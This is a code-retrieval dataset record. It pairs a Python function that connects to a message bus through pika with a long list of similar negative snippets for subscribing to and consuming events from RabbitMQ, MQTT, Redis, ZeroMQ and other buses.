def consume_message_bus(self, test=False): if test: from test_fake_bus import FakeChannel, FakeConnection self.logger.info("Running Test Message Bus") self.channel = FakeChannel(self.on_bus_message, self.forwarder_options, self.logger) self.connection = FakeConnection() return username, password = self.get_bus_credentials() credentials = pika.PlainCredentials(username, password) parameters = pika.ConnectionParameters(self.cb_server_hostname, 5004, "/", credentials) self.connection = pika.SelectConnection(parameters, self.bus_on_connected, on_close_callback=self.bus_on_closed) self.logger.info("Starting bus connection") self.retry_attempts = 0 self.connection.ioloop.start()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def subscribe(receiver):", "def subscribe(receiver):", "def subscribe(receiver):", "def subscribe(self):\n if hasattr(self.bus, \"signal_handler\"):\n self.bus.signal_handler.subscribe()\n if hasattr(self.bus, \"console_control_handler\"):\n self.bus.console_control_handler.subscribe()", "def subscribe(self, event_handler):\n pass # pragma: no cover", "def subscribe(receiver, catchup):", "def subscribeConsumer(consumer):", "def subscribe(self) -> None:\n events = [\n HathorEvents.NETWORK_NEW_TX_ACCEPTED,\n HathorEvents.NETWORK_PEER_CONNECTING,\n HathorEvents.NETWORK_PEER_READY,\n HathorEvents.NETWORK_PEER_CONNECTED,\n HathorEvents.NETWORK_PEER_DISCONNECTED,\n HathorEvents.NETWORK_PEER_CONNECTION_FAILED\n ]\n\n for event in events:\n self.pubsub.subscribe(event, self.handle_publish)", "def enable_subscription():\n client = KConsumer(config=subscriber_config)\n counter = 0\n while 1:\n data = client.consume()\n if data:\n print(\"Received Data\", counter)\n class_label = inference_on_data(data.value)\n publish_response(class_label)", "def subscribeToEvent(eventName,subscriber,msgInterface):", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def startListening(self):\n mgr = self.cxn.manager\n # example of Signal processing:\n # server = self.cxn[self.selectedADR]\n # update_state = lambda c, payload: self.updateInterface()\n # yield server.signal_state_changed(self.ID)\n # yield server.addListener(listener = update_state, source=None,ID=self.ID)\n\n # state update (only if the message is from the correct ADR server)\n update_state = lambda c, (s,payload): self.updateInterface() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(update_state, source=mgr.ID, ID=101)\n yield mgr.subscribe_to_named_message('State Changed', 101, True)\n # log update\n update_log = lambda c, (s,(t,m,a)): self.updateLog(t,m,a) \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(update_log, source=mgr.ID, ID=102)\n yield mgr.subscribe_to_named_message('Log Changed', 102, True)\n # magging up stopped\n mag_stop = lambda c, (s,payload): self.magUpStopped() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(mag_stop, source=mgr.ID, ID=103)\n yield mgr.subscribe_to_named_message('MagUp Stopped', 103, True)\n # regulation stopped\n reg_stop = lambda c, (s,payload): self.regulationStopped() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(reg_stop, source=mgr.ID, ID=104)\n yield mgr.subscribe_to_named_message('Regulation Stopped', 104, True)\n # magging up started\n mag_start = lambda c, (s,payload): self.magUpStarted() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(mag_start, source=mgr.ID, ID=105)\n yield mgr.subscribe_to_named_message('MagUp Started', 105, True)\n # regulation started\n reg_start = lambda c, (s,payload): self.regulationStarted() \\\n if self.correctServer(s) else -1\n self.cxn._cxn.addListener(reg_start, source=mgr.ID, ID=106)\n yield mgr.subscribe_to_named_message('Regulation Started', 106, True)\n # servers starting and stopping\n serv_conn_func = lambda c, (sID, sName): self.serverChanged(sName)\n serv_disconn_func = lambda c, (sID, sName): self.serverChanged(sName)\n self.cxn._cxn.addListener(serv_conn_func, source=mgr.ID, ID=107)\n self.cxn._cxn.addListener(serv_disconn_func, source=mgr.ID, ID=108)\n yield mgr.subscribe_to_named_message('Server Connect', 107, True)\n yield mgr.subscribe_to_named_message('Server Disconnect', 108, True)", "def process_amqp_events(self):\n 
self.connection.process_data_events()", "def subscribe(self, callback):\n self.channel.basic_consume(callback, queue=self.queue_name)\n self.channel.start_consuming()", "def _start_event_stream(self):\r\n\r\n # Register with an event queue, which will be used as event source:\r\n self._event_queue = self._call_factory(\"subscribe\")\r\n if self._event_queue is None:\r\n self.logger.debug(\"SseHTTPRequestHandler(Thread-%s): no queue, \"\r\n \"stopping this thread\",\r\n threading.current_thread().ident)\r\n # As per http://dev.w3.org/html5/eventsource/, a response code\r\n # of 204 tells the browser not to reconnect:\r\n self.send_response(204)\r\n return\r\n self.logger.debug(\"SseHTTPRequestHandler(Thread-%s): registered queue, \"\r\n \"start sending events\", threading.current_thread().ident)\r\n\r\n # Send HTTP headers:\r\n self.send_response(200)\r\n self.send_header(\"Content-type\", \"text/event-stream\")\r\n self.end_headers()\r\n\r\n # Start event serving loop:\r\n self._send_events()", "def receive_incoming_messages_thread(self):\n\n def on_error(partition_context, error):\n logger.error(\"EventHub on_error: {}\".format(str(error) or type(error)))\n\n def on_partition_initialize(partition_context):\n logger.warning(\"EventHub on_partition_initialize\")\n\n def on_partition_close(partition_context, reason):\n logger.warning(\"EventHub on_partition_close: {}\".format(reason))\n\n def on_event(partition_context, event):\n reset_watchdog()\n if event:\n self.executor.submit(self.dispatch_incoming_message, event)\n\n logger.info(\"Starting EventHub receive\")\n with self.eventhub_consumer_client:\n self.eventhub_consumer_client.receive(\n on_event,\n on_error=on_error,\n on_partition_initialize=on_partition_initialize,\n on_partition_close=on_partition_close,\n max_wait_time=30,\n )", "def _event_subscribe(self) -> None:\n self.gateway.groups.subscribe(\n self.group_data_callback,\n event_filter=(EventType.ADDED, EventType.CHANGED),\n )", "def init_events_transmitter():\n class StatusListener(SubscribeCallback):\n def status(self, pubnub, status):\n event = \"unknown\"\n\n if status.operation == PNOperationType.PNSubscribeOperation \\\n and status.category == PNStatusCategory.PNConnectedCategory:\n event = \"Connect\"\n elif status.operation == PNOperationType.PNUnsubscribeOperation \\\n and status.category == PNStatusCategory.PNAcknowledgmentCategory:\n event = \"Unsubscribe\"\n\n asyncio.ensure_future(pubnub.publish().channel('status-' + APP_KEY).message({\n \"event\": event\n }).future(), loop=loop)\n\n def presence(self, pubnub, presence):\n pass\n\n def message(self, pubnub, message):\n pass\n\n listener = StatusListener()\n pubnub.add_listener(listener)", "def _on_connect(self, client, userdata, flags, rc):\n self.subscribe(self.topic)", "def on_subscribe(self, mqtt_client, userdata, mid, granted_qos):\n logging.debug(\"DEBUG - subscribe ack received\")", "def start(self):\n self.kb_client.subscribe(self.kb_ID, {\"_data\": {\"tag\": TAG_ANSWER, \"text\": \"$input\", \"timestamp\": \"$time\", \"language\": \"$lang\"}}, self.add_emotion) # from the 'gnlp' module", "def subscribe(self):\n with self._rabbit_connection.connection.channel() as channel:\n self._queue = rabbitpy.Queue(\n channel=channel,\n name=self._subscriber_name + \"_queue\",\n durable=True,\n message_ttl=5 * 24 * 60 * 60 * 1000 # 5 days\n )\n self._queue.declare()\n self._queue.bind(self._exchange, self._routing_key)\n\n self._consume()", "def subscribe(receiver, updateInterval=10):", "def listen(self):\n 
self.channel.start_consuming()", "def subscribe(self):\n if not self._subscribed and self._connected:\n if ATTR_STREAM_ID not in self.data:\n msg = self._create_message(strings.SUB_MSG)\n self.write(msg)\n else:\n msg = self._create_message(strings.RESUB_MSG)\n self.write(msg)\n self._subscribed = True", "def subscribe(receiver, updateInterval=None):", "def on_connect():\n print('Market Data Socket connected successfully!')\n\n # Subscribe to instruments\n print('Sending subscription request for Instruments - \\n' + str(Instruments))\n response = xt.send_subscription(Instruments, 1501)\n print('Sent Subscription request!')\n print(\"Subscription response: \", response)", "def start_consuming(self):\n logger.info('Issuing consumer related RPC commands')\n self.add_on_cancel_callback()\n logger.info(\"[{}] Waiting for messages on exchange {}\".format(self.bot_id, self.exchange))\n self._consumer_tag = self._channel.basic_consume(self.on_message,\n self.queue_name)", "def subscribe(self, topic):\n self.topic = topic\n self.client.on_connect = self.on_connect\n self.client.on_message = self.on_message\n\n self.client.loop_start()", "def event_publish(self, cmd):\n for sub in self.subscribers:\n sub.event_receive(cmd)", "def listen(self):\n self._client.listen(self._default_subscribe_to_dest)", "def run(self):\n print('starting up on {} port {}'.format(*self.listener_address))\n self.selector.register(self.listener, selectors.EVENT_READ)\n\n # Serialize our listener's host and port\n serializedAdd = fxp_bytes_subscriber.serialize_address(\n self.listener_address[0], self.listener_address[1])\n\n # Contact with Publisher\n self.listener.sendto(serializedAdd, self.gcd_address)\n\n while True:\n events = self.selector.select(CHECK_INTERVAL)\n for key, mask in events:\n data = self.receive_message()\n self.removeOldQuote()\n self.createGraph(data)\n self.arbitrage()\n self.checkTimeout()", "def read(self):\n log.info(\"==>\")\n # TODO exceptions\n assert self.subscription_list is not None\n if not self.is_once():\n assert self.read_queue is not None\n event = None\n first_sample = True\n while True:\n log.debug(\"Processing event type %s\", event)\n # SAMPLE is handled in the same way as \"first_sample\"\n if first_sample or event == self.SubscriptionEvent.SAMPLE:\n response = self.sample(\n start_monitoring=self.is_monitor_changes() and first_sample)\n yield response\n if first_sample:\n yield self.sync_response()\n first_sample = False\n if self.is_once():\n break\n elif event == self.SubscriptionEvent.FINISH:\n log.debug(\"finishing subscription read\")\n break\n elif event == self.SubscriptionEvent.SEND_CHANGES:\n response = self.changes()\n log.debug(\"Sending changes\")\n yield from response\n elif event is None:\n log.warning(\"**** event is None ! ****\")\n # TODO error\n break\n else:\n log.warning(\"**** event=%s not processed ! 
****\", event)\n # TODO error\n break\n log.debug(\"Waiting for event\")\n event = self.read_queue.get()\n log.debug(\"Woke up event=%s\", event)\n if self.is_monitor_changes():\n self.stop_monitoring()\n\n log.info(\"<==\")", "def _subscribe_to_peers(self):\n if not self.config['PEERS']:\n return\n context = zmq.Context()\n socket = context.socket(zmq.SUB)\n socket.setsockopt(zmq.SUBSCRIBE, '')\n\n for ip, pub_port, api_port in self.config['PEERS']:\n if not self._is_self(ip, pub_port):\n address = '%s:%s' % (ip, pub_port)\n self.logger.debug('Subscribing to peer at: %s' % address)\n socket.connect('tcp://%s' % address)\n\n def new_msg_handler(sender, msg=None):\n topic, delimiter, packed = msg.partition(' ')\n topic = int(topic)\n message_dict = msgpack.unpackb(packed)\n #self.logger.debug('News for topic %s:%s arrived' %\n # (topic, constants.topics.get(topic)))\n self._handle_topic(topic, message_dict)\n\n sig = signal(constants.NEW_MESSAGE_TOPIC)\n sig.connect(new_msg_handler, weak=False)\n\n while True:\n msg = socket.recv()\n sig.send(self, msg=msg)\n gevent.sleep(.1)", "def event_in_cb(self, msg):\n self.event = msg.data", "def event_stream(self):\n for message in self.subscribe():\n event = message_to_sse(message[\"data\"])\n yield event", "async def cb_nr_subscription_handler(msg: nats.aio.client.Msg):\n try:\n logger.info('Received raw message seq:%s, data= %s', msg.sequence, msg.data.decode())\n event_message = json.loads(msg.data.decode('utf-8'))\n logger.debug('Event Message Received: %s', event_message)\n await process_event(event_message, FLASK_APP)\n except Exception: # noqa pylint: disable=broad-except\n # Catch Exception so that any error is still caught and the message is removed from the queue\n logger.error('Queue Error: %s', json.dumps(event_message), exc_info=True)", "async def consume(\n self,\n listen_for: List[Tuple[str, str]],\n listener_name: str,\n bus_client: \"BusClient\",\n **kwargs,\n ) -> AsyncGenerator[List[EventMessage], None]:\n raise NotImplementedError(\n f\"Event transport {self.__class__.__name__} does not support listening for events\"\n )", "def handleMessage_started(self, message):\n self.eventbus.publish(MarathonStartedEvent())", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def start(self):\n if self._chan is not None:\n try:\n self._chan.start_consume()\n except ChannelError:\n log.info('Subscriber is already started')\n\n else:\n self.gl = spawn(self.listen)", "async def next_event(self):\n if not self._open:\n raise WebsocketClosedError(1006, reason=\"Connection lost\")\n\n try:\n event = await self.websocket.poll()\n except WebsocketClosedError:\n # Close ourselves.\n await self._close()\n raise\n\n if isinstance(event, (bytes, bytearray)):\n # decompress the message\n event = zlib.decompress(event, 15, 10490000)\n event = event.decode(\"utf-8\")\n\n if event is None:\n return\n\n event = json.loads(event)\n\n op = event.get(\"op\")\n data = event.get(\"d\")\n seq = event.get(\"seq\")\n\n # Heartbeat logic, same as normal websocket\n if seq is not None:\n self.sequence = int(seq)\n\n # Switch based on operator.\n if op == VGatewayOp.HELLO:\n # Ignore these, they're useless for now.\n return\n\n elif op == VGatewayOp.READY:\n 
# Start heartbeating.\n heartbeat_interval = data.get(\"heartbeat_interval\", 45000) / 1000.0\n logger.debug(\"Heartbeating every {} seconds.\".format(heartbeat_interval))\n self._start_heartbeating(heartbeat_interval)\n # Set our `ssrc`, `port` and `modes`.\n self.ssrc = data.get(\"ssrc\")\n self.port = data.get(\"port\")\n\n await self._ready.set()\n\n elif op == VGatewayOp.SESSION_DESCRIPTION:\n # Extract the secret key.\n self.secret_key = data.get('secret_key')\n self.send_speaking()\n await self._got_secret_key.set()\n\n elif op == VGatewayOp.HEARTBEAT:\n # silence\n pass\n\n elif op == VGatewayOp.HEARTBEAT_ACK:\n # suppress\n pass\n\n else:\n logger.warning(\"Unhandled event: {}\".format(op))", "def run(self):\n self.logger.info(\"starting Dashi consumer\")\n while not self.shutdown:\n self.rpc.listen()", "def _begin_consuming(self):\n self._consuming = True\n loop = asyncio.get_event_loop()\n self._message_queue = asyncio.Queue(\n maxsize=self.app.settings['SQS_PREFETCH_LIMIT'],\n loop=loop,\n )\n loop.create_task(self._consume())", "def eventmonitorloop(self):\n if self.service is None:\n return\n logger.info(\"Subscribing to EMANE location events (not generating them). \" \\\n \"(%s) \" % threading.currentThread().getName())\n while self.doeventloop is True:\n if emane.VERSION >= emane.EMANE091:\n uuid, seq, events = self.service.nextEvent()\n if not self.doeventloop:\n break # this occurs with 0.9.1 event service\n for event in events:\n (nem, eid, data) = event\n if eid == LocationEvent.IDENTIFIER:\n self.handlelocationevent2(nem, eid, data)\n else:\n (event, platform, nem, cmp, data) = self.service.nextEvent()\n if event == emaneeventlocation.EVENT_ID:\n self.handlelocationevent(event, platform, nem, cmp, data)\n logger.info(\"Unsubscribing from EMANE location events. (%s) \" % threading.currentThread().getName())", "def subscribe_to_commands(self):\n self.basic_consume(self.process_command, queue=self.name)", "def test_connect_subscriber():\n config = {\"listeners\": \"localhost:8080\"}\n registry = Registry()\n registry.new(name=\"test\", backend=\"dummy\", **config)\n\n dummy = registry[\"test\"]\n subscriber = dummy.subscribe([\"mytopic\"])\n message = subscriber.listen()\n\n assert message == \"Dummy Message\"\n subscriber._connect.assert_called_once()", "def run(config, logging, inq, subscribe_callback, unsubscribe_callback):", "def put_event(self, event):\n log.info(\"==> event=%s\", event)\n assert self.subscription_list is not None\n assert self.read_queue is not None\n self.read_queue.put(event)\n log.info(\"<== \")", "def start(self) -> None:\n conn_manager = ConnectionManager(broker_host=self.broker_host, queue=self.queue)\n channel = conn_manager.start_channel()\n channel.basic_consume(queue=self.queue, on_message_callback=self.callback)\n\n try:\n print(\"PV Simulator...\")\n channel.start_consuming()\n except KeyboardInterrupt:\n pass", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. 
This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple 
requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "def StartSubscriptions(self):\n rospy.Subscriber('/drivers/dvl', Dvl, self.dvl_callback)\n rospy.Subscriber('/drivers/imu', Imu, self.imu_callback)\n rospy.Subscriber('/reference/depth', Position, self.refDepth_callback)\n rospy.Subscriber('/reference/speed', Speed, self.refSpeed_callback)\n rospy.Subscriber('/reference/rpy', Euler, self.refRpy_callback)\n rospy.Subscriber('/reference/ll', Position, self.refLL_callback)\n rospy.Subscriber('/control/trackers_enabled', Trackers, self.trackersControl_callback)", "def processEvents(self):\n if not self.getIsConnected():\n return\n\n # Loop until there is no more data in the receive buffer.\n while True:\n if not self._socketPoller.isReady():\n # There is no data waiting.\n return\n\n nBytesRead, _ = self._socket.recvfrom_into(self._buffer)\n if nBytesRead <= 0:\n # Since we checked for data ready, we don't expect this.\n return\n\n # _bufferView is a memoryview, so we can slice efficienty.\n self._elementReader.onReceivedData(self._bufferView[0:nBytesRead])", "def eventInCallback(self, msg):\n rospy.loginfo(\"event_in msg received\")\n self.event_in = msg.data", "def _eventloop(self):\n logging.debug(\"%s - eventloop started\" % self.name)\n while not self.stopped:\n event = self.inqueue.get()\n if not event: break\n self.doevent(event)\n logging.debug(\"%s - eventloop stopped\" % self.name)", "def on_connected(self):\n logger.info('connection to redis resumed')\n for chid in self.clients.iterkeys():\n self.subscriber.psubscribe(chid)", "def starup(self, sender, **kwargs):\n self._initialize_devices()\n for device_topic in device_topic_dict:\n _log.debug('Subscribing to ' + device_topic)\n self.vip.pubsub.subscribe(peer='pubsub',\n prefix=device_topic,\n callback=self.on_analysis_message)", "def mqtt_sub():\n global args\n args = parse_args()\n init(args)\n mqtt_connection = setup_connection(args)\n\n connect_future = mqtt_connection.connect()\n # Future.result() waits until a result is available\n connect_future.result()\n print(\"Connected!\")\n\n # Subscribe\n print(f\"Subscribing to topic '{args.subscribe_topic}'...\")\n subscribe_future, packet_id = mqtt_connection.subscribe(\n topic=args.subscribe_topic,\n qos=mqtt.QoS.AT_LEAST_ONCE,\n callback=on_message_received,\n )\n\n subscribe_result = subscribe_future.result()\n print(\"Subscribed with {}\".format(str(subscribe_result[\"qos\"])))\n\n # Wait for all messages to be received.\n # This waits forever if count was set to 0.\n if args.count != 0 and not received_all_event.is_set():\n print(\"Waiting for all messages to be received...\")\n\n received_all_event.wait()\n print(f\"{received_count} message(s) received.\")\n\n # Disconnect\n print(\"Disconnecting...\")\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print(\"Disconnected!\")", "def subscribe(self):\n pubsub = self.redis_client.pubsub()\n pubsub.subscribe(self.message_channel)\n for item in pubsub.listen():\n if item.get(\"data\") not in (1, None):\n yield item", "def attach_message_bus(self):\n print(\"Connecting to Mycroft message bus\")\n self.client = MessageBusClient()\n print(\"Calling client.run_in_thread()\")\n try:\n self.client.run_in_thread()\n except Exception as 
e:\n print(\"ERROR: run_in_thread() failed - is Mycroft running?\")\n sys.exit(1)", "def do_start(self):\n threading.Thread(group = None, \n target = self._subscribe_message, name = \"RabbitMQSubscribeThread\") .start()\n threading.Thread(group = None, \n target = self._publish_message, name = \"RabbitMQPublishThread\").start()", "def consumeMsg():\n\tosuser = 'osdev'\n\tospass = 'osdev'\n\toshost = '10.32.29.94'\n\tosport = '5672'\n\tosvhost = '/openstack'\n\tneutronExchange = Exchange('quantum', type='topic', durable=False)\n\tinfoQueue = Queue('exthook', exchange=neutronExchange , durable=False,\n\t\t\trouting_key='notifications.info')\n\twith Connection(\"\".join(['amqp://', osuser, ':', ospass, '@', \n\t\toshost, ':',osport, '/', osvhost])) as conn:\n\t\twith conn.Consumer(infoQueue, callbacks=[msgParse]):\n\t\t\twhile True:\n\t\t\t\ttry: \n\t\t\t\t\tconn.drain_events()\n\t\t\t\texcept Exception, e:\n\t\t\t\t\tlogging.exception('Draining events from AMQP stop')\n\t\t\t\t\tbreak", "def _listen(self, uuid=None, session=None):\n if session:\n from .nurest_session import _NURESTSessionCurrentContext\n _NURESTSessionCurrentContext.session = session\n\n if self.url is None:\n raise Exception(\"NURESTPushCenter needs to have a valid URL. please use setURL: before starting it.\")\n\n events_url = \"%s/events\" % self.url\n if uuid:\n events_url = \"%s?uuid=%s\" % (events_url, uuid)\n\n request = NURESTRequest(method='GET', url=events_url)\n\n # Force async to False so the push center will have only 1 thread running\n connection = NURESTConnection(request=request, async=True, callback=self._did_receive_event, root_object=self._root_object)\n\n if self._timeout:\n if int(time()) - self._start_time >= self._timeout:\n pushcenter_logger.debug(\"[NURESTPushCenter] Timeout (timeout=%ss).\" % self._timeout)\n return\n\n else:\n connection.timeout = self._timeout\n\n pushcenter_logger.info('Bambou Sending >>>>>>\\n%s %s' % (request.method, request.url))\n\n #connection.ignore_request_idle = True\n connection.start()", "def subscribe(self, channel, **kwargs):\n pass", "def _send_events(self):\r\n _message_number = 0\r\n _stop = False\r\n while not _stop:\r\n _message_number += 1\r\n try:\r\n _message_contents = self._event_queue.get()\r\n if self._check_message(_message_contents):\r\n self._send_message(_message_contents, _message_number)\r\n if _message_contents[\"event\"] == \"terminate\":\r\n _stop = True\r\n except IOError as ex:\r\n if ex.errno == 10053 or ex.errno == 10054 or ex.errno == 32:\r\n self.logger.info(\"_SseSender(Thread-{0}): \"\r\n \"client closed connection.\".format(\r\n threading.current_thread().ident))\r\n _stop = True\r\n else:\r\n self.logger.warning(\"_SseSender(Thread-{0}): \"\r\n \"I/O error({1}): \"\r\n \"{2}\".format(threading.current_thread().ident,\r\n ex.errno, ex.strerror))\r\n except:\r\n self.logger.error(\"_SseSender(Thread-{0}): Unexpected error: \"\r\n \"{1}\".format(threading.current_thread().ident,\r\n sys.exc_info()[0]))\r\n self.logger.info(\"_SseSender(Thread-{0}): stopping _send_events \"\r\n \"loop.\".format(threading.current_thread().ident))\r\n self._call_factory(\"unsubscribe\")", "def test_subscribe_any_listener(self):\n with self.assertRaises(AssertionError):\n EVENT_MANAGER.subscribe('test_any_listener')", "def listen(self):\n result = self.channel.queue_declare(queue=self.config['queue'], \n exclusive=True)\n if self.endpoints is not None:\n for key in self.endpoints:\n self.channel.queue_bind(exchange=self.config['exchange'], \n 
queue=self.config['queue'],\n routing_key=f\"sensor_value.{key}\")\n else:\n self.channel.queue_bind(exchange=self.config['exchange'],\n queue=self.config['queue'],\n routing_key=\"sensor_value.#\")\n \n self.channel.basic_consume(queue=self.config['queue'], \n on_message_callback=self.decode_values, \n auto_ack=True)\n\n # starts a while-type loop\n print(\"wabbit eatin hay\")\n self.channel.start_consuming()", "def subscribe(self, subject):\n pass", "def subscribe(self, service_name, event_name, callback):\n msg = SubscribeMessage(service_name=service_name, event_name=event_name)\n self.send_message_blocking(msg)\n\n # if subscribe failed an exception should be raised by now\n self._event_callbacks[(service_name, event_name)] = callback", "def start_consuming(self, channel, rx_queue_name):\n if self.should_stop():\n logger.info(\"ready to stop, pause to consume\")\n return\n logger.info('Issuing consumer related RPC commands')\n self._consumer_tag = channel.basic_consume(\n self.on_message, rx_queue_name, auto_ack = False)\n channel.start_consuming()", "def start_consuming(self):\n self.logger.debug(\"Issuing consumer related RPC commands\")\n\n self._channel.basic_qos(prefetch_count=self._max_concurrent)\n self._channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\n consume_kwargs = {\"queue\": self._queue_name}\n if PIKA_ONE:\n consume_kwargs[\"on_message_callback\"] = self.on_message\n else:\n consume_kwargs[\"consumer_callback\"] = self.on_message\n\n self._consumer_tag = self._channel.basic_consume(**consume_kwargs)", "def subscribe(self):\n fd = libplasma.subscribe(self.conn)\n self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)\n # Make the socket non-blocking.\n self.notification_sock.setblocking(0)", "def subscribe(self, transport, data):\r\n\r\n self.add(transport, address=data.get('hx_subscribe'))\r\n\r\n self.send(\r\n data.get('hx_subscribe'),\r\n {'message': \"%r is listening\" % transport}\r\n )", "def subscribe2API():\n\tconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\n\tchannel = connection.channel()\n\n\tchannel.queue_declare(queue='ToAPIgatewayQueue')\n\n\tdef callback(ch, method, properties, body):\n\t\tif(body != ''):\t\n\t\t\tconnection.close()\n \t\tpublish2apiHandler(body)\n\t\t\t\n\t\t\t\n\t\t\t\n\tchannel.basic_consume(callback, queue='ToAPIgatewayQueue', no_ack=True)\n\n\tprint(' [*] Waiting for messages. 
To exit press CTRL+C')\n\tchannel.start_consuming()\n\t\n\treturn", "def _on_received(self):\n self._call_subscribers(on_level=0xFF)\n publish_topic(self._on_subscriber_topic, on_level=0xFF)", "def _on_received(self):\n self._call_subscribers(on_level=0xFF)\n publish_topic(self._on_subscriber_topic, on_level=0xFF)", "def test_register_events():\n event_bus = MockEventBus()\n test_module.register_events(event_bus)\n assert event_bus.topic_patterns_to_subscribers", "def start(self) -> None:\n\n self.bus.subscribe(\"server:ready\", self.setup)\n self.bus.subscribe(\"bookmarks:find:id\", self.find_id)\n self.bus.subscribe(\"bookmarks:find:url\", self.find_url)\n self.bus.subscribe(\"bookmarks:add\", self.add)\n self.bus.subscribe(\"bookmarks:add:fulltext\", self.add_full_text)\n self.bus.subscribe(\"bookmarks:domaincount\", self.domain_count)\n self.bus.subscribe(\"bookmarks:search\", self.search)\n self.bus.subscribe(\"bookmarks:prune\", self.prune)\n self.bus.subscribe(\"bookmarks:recent\", self.recent)\n self.bus.subscribe(\"bookmarks:tags:all\", self.all_tags)\n self.bus.subscribe(\"bookmarks:remove\", self.remove)\n self.bus.subscribe(\"bookmarks:repair\", self.repair)", "def on_connect():\n # There is now a connection\n subscribe_to_topic(\"pir\",\"Trigger\")", "async def _track_and_propagate_available_endpoints(self) -> None:\n async for ev in self._endpoint.stream(EventBusConnected):\n self._available_endpoints = self._available_endpoints + (ev.connection_config,)\n self.logger.debug(\"New EventBus Endpoint connected %s\", ev.connection_config.name)\n # Broadcast available endpoints to all connected endpoints, giving them\n # a chance to cross connect\n await self._endpoint.broadcast(AvailableEndpointsUpdated(self._available_endpoints))\n self.logger.debug(\"Connected EventBus Endpoints %s\", self._available_endpoints)", "def stasis_start_cb(channel, ev):\n await channel.answer()\n await bridge.addChannel(channel=channel.id)", "async def test_event(bus: lightbus.BusNode, dummy_api, stream_use):\n bus.bus_client.transport_registry.get_event_transport('default').stream_use = stream_use\n manually_set_plugins({})\n received_kwargs = []\n received_api_name = None\n received_event_name = None\n\n async def listener(api_name, event_name, **kwargs):\n nonlocal received_kwargs, received_api_name, received_event_name\n received_kwargs.append(kwargs)\n received_api_name = api_name\n received_event_name = event_name\n\n await bus.my.dummy.my_event.listen_async(listener)\n await asyncio.sleep(0.01)\n await bus.my.dummy.my_event.fire_async(field='Hello! 😎')\n await asyncio.sleep(0.01)\n\n # await asyncio.gather(co_fire_event(), 